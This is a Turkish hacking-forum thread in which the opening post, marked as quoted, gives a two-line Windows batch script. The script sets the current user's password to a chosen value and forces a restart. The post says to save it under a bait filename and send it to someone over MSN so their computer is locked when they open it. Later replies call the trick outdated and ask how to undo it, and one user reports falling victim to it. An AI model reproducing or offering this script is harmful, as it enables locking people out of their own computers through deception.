Karşı Pc'ye Şifre Koy Herkes Yapabilir

sefasss

Katılımcı Üye
29 Ağu 2009
839
0
~EfS@Ne~
Karşı Pc'ye Şifre Koy Herkes Yapabilir
Bu Konuyu Açmamın Sebebi Çok Kişi Bunu Anlatmış Ama Arkadaşlar Anlamamış Veya Yapamamış Bunda İse Çok Basit Hadi Kolay GeLsin :)

arkadaslar herkes yapabılır cok basıt bısey
ilk olarak Not Defterini açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: kızlar.bat)(kızlar falan deyınde adam yutsun)
code:
net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz değiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşı tarafa bi şekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmişolur pc'yi kendisi kapadığıanda şifreleniraçıldığında parola sorar bilen açar bilemeyen açamaz
100%100 calısıyor

(aLıNTıDıR)

mod98

Uzman üye
10 Eki 2009
1,110
0
nereye
Sağol Fakat Bu Eskidi... Eskidi Derken Artık Kimse BAT Uzantılı Olduğu İçin İnanmıyor :)

canberko

Yeni üye
29 Ağu 2007
18
0
kardeş diyelim biz bunu birisine yaptık tanıdığımız birine sonra tanıdığımız şifreyi istedi bizde verdik sonra o şifre bi daha her seferinde istermi ? isterse nasıl kpatabiliriz ?...

laskok16

Yeni üye
18 Tem 2011
13
0
Arkadaşlar bn dün bi dosya indirdim sanırım bunun içinde bunun gibi bi dosya vardı bende bunu bilmediğim için tıkladım . Sonra bi kaç dk içinde pc kendi kendine kapandı . Tekrar girmeye çalıştım pc ye şifre koymuşlar pc windows 7 ben bu şifreyi nasıl bulabılırım

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.